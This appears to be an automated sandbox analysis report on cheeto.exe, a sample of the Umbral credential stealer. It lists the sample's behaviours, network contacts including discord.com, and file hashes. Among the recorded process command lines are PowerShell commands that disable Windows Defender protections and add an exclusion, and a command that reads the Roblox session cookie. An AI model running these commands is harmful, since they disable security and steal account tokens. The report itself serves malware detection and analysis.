Analysis Overview
SHA256
e82372deee967ba8a1a74e29a8887ac64e700554153267d09a184986a98efa29
Threat Level: Known bad
The file cheeto.exe was found to be: Known bad.
Malicious Activity Summary
Detect Umbral payload
Umbral
Umbral family
Drops file in Drivers directory
Command and Scripting Interpreter: PowerShell
Reads user/profile data of web browsers
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Unsigned PE
Suspicious behavior: EnumeratesProcesses
Modifies data under HKEY_USERS
Suspicious use of SetWindowsHookEx
Enumerates system info in registry
Suspicious use of WriteProcessMemory
Modifies registry class
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Views/modifies file attributes
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Runs ping.exe
Detects videocard installed
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-23 11:11
Signatures
Detect Umbral payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Umbral family
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-23 11:11
Reported
2024-06-23 11:56
Platform
win11-20240508-en
Max time kernel
2699s
Max time network
2696s
Command Line
Signatures
Detect Umbral payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Umbral
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\cheeto.exe | N/A |
Reads user/profile data of web browsers
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133636147488275763" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\cheeto.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\cheeto.exe
"C:\Users\Admin\AppData\Local\Temp\cheeto.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\cheeto.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\cheeto.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\cheeto.exe" && pause
C:\Windows\system32\PING.EXE
ping localhost
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff97200ab58,0x7ff97200ab68,0x7ff97200ab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1520 --field-trial-handle=1796,i,13074497499391876259,2648692014614088414,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2120 --field-trial-handle=1796,i,13074497499391876259,2648692014614088414,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2200 --field-trial-handle=1796,i,13074497499391876259,2648692014614088414,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3048 --field-trial-handle=1796,i,13074497499391876259,2648692014614088414,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3120 --field-trial-handle=1796,i,13074497499391876259,2648692014614088414,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4164 --field-trial-handle=1796,i,13074497499391876259,2648692014614088414,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4348 --field-trial-handle=1796,i,13074497499391876259,2648692014614088414,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4484 --field-trial-handle=1796,i,13074497499391876259,2648692014614088414,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4724 --field-trial-handle=1796,i,13074497499391876259,2648692014614088414,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4780 --field-trial-handle=1796,i,13074497499391876259,2648692014614088414,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4848 --field-trial-handle=1796,i,13074497499391876259,2648692014614088414,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff97200ab58,0x7ff97200ab68,0x7ff97200ab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1616 --field-trial-handle=1940,i,739001258986638570,13851075112784601801,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1852 --field-trial-handle=1940,i,739001258986638570,13851075112784601801,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2228 --field-trial-handle=1940,i,739001258986638570,13851075112784601801,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3052 --field-trial-handle=1940,i,739001258986638570,13851075112784601801,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3100 --field-trial-handle=1940,i,739001258986638570,13851075112784601801,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3820 --field-trial-handle=1940,i,739001258986638570,13851075112784601801,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4316 --field-trial-handle=1940,i,739001258986638570,13851075112784601801,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4480 --field-trial-handle=1940,i,739001258986638570,13851075112784601801,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4644 --field-trial-handle=1940,i,739001258986638570,13851075112784601801,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4476 --field-trial-handle=1940,i,739001258986638570,13851075112784601801,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4476 --field-trial-handle=1940,i,739001258986638570,13851075112784601801,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4736 --field-trial-handle=1940,i,739001258986638570,13851075112784601801,131072 /prefetch:1
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4716 --field-trial-handle=1940,i,739001258986638570,13851075112784601801,131072 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | 227.16.217.172.in-addr.arpa | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 162.159.137.232:443 | discord.com | tcp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | 196.187.250.142.in-addr.arpa | udp |
| GB | 172.217.16.238:443 | apis.google.com | tcp |
| GB | 172.217.169.46:443 | play.google.com | tcp |
| GB | 142.250.187.206:443 | clients2.google.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| GB | 142.250.187.196:443 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| GB | 172.217.16.238:443 | apis.google.com | udp |
| GB | 172.217.169.46:443 | play.google.com | udp |
| GB | 142.250.187.206:443 | clients2.google.com | udp |
| GB | 172.217.169.67:443 | beacons.gcp.gvt2.com | tcp |
| GB | 172.217.169.67:443 | beacons.gcp.gvt2.com | tcp |
| GB | 172.217.169.67:443 | beacons.gcp.gvt2.com | udp |
Files
memory/436-0-0x000001C8B84D0000-0x000001C8B8510000-memory.dmp
memory/436-1-0x00007FF971813000-0x00007FF971815000-memory.dmp
memory/436-2-0x00007FF971810000-0x00007FF9722D2000-memory.dmp
memory/5112-3-0x00007FF971810000-0x00007FF9722D2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_q04zb405.vv3.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/5112-12-0x000001CFCA9E0000-0x000001CFCAA02000-memory.dmp
memory/5112-14-0x00007FF971810000-0x00007FF9722D2000-memory.dmp
memory/5112-13-0x00007FF971810000-0x00007FF9722D2000-memory.dmp
memory/5112-17-0x00007FF971810000-0x00007FF9722D2000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 627073ee3ca9676911bee35548eff2b8 |
| SHA1 | 4c4b68c65e2cab9864b51167d710aa29ebdcff2e |
| SHA256 | 85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c |
| SHA512 | 3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 1a9fa92a4f2e2ec9e244d43a6a4f8fb9 |
| SHA1 | 9910190edfaccece1dfcc1d92e357772f5dae8f7 |
| SHA256 | 0ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888 |
| SHA512 | 5d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64 |
memory/436-31-0x000001C8D2D20000-0x000001C8D2D96000-memory.dmp
memory/436-32-0x000001C8BA5B0000-0x000001C8BA600000-memory.dmp
memory/436-33-0x000001C8BA430000-0x000001C8BA44E000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | fa21dd50b4e64421076f843031c8ccf7 |
| SHA1 | 2c56e94f130c0d8d77116e939ffee4e37cf982bd |
| SHA256 | e4f21aca1e12aafa8de7af24b79a75526e902c7d4b3fea5bdb6e723976997be3 |
| SHA512 | b8de2bfeb7af06c587dd1f424d410cf83471f31a55a3ea4c4481ce07ffd9bf66ddc1f7775ecd6ac65ac33baaec90ba5a208a9aefc84f31125a50dfb919982687 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 7332074ae2b01262736b6fbd9e100dac |
| SHA1 | 22f992165065107cc9417fa4117240d84414a13c |
| SHA256 | baea84fda6c1f13090b8cbd91c920848946f10ce155ef31a1df4cd453ee7e4aa |
| SHA512 | 4ae6f0e012c31ac1fc2ff4a8877ce2b4667c45b6e651de798318a39a2b6fd39a6f72dffa8b0b89b7a045a27d724d195656faa25a9fec79b22f37ddebb5d22da2 |
memory/436-67-0x000001C8BA590000-0x000001C8BA59A000-memory.dmp
memory/436-68-0x000001C8BA620000-0x000001C8BA632000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 17d36e2871735da5dc714f2989e25f06 |
| SHA1 | 15fd7420c63c69cc5c543c1dd51bbd85a32802b5 |
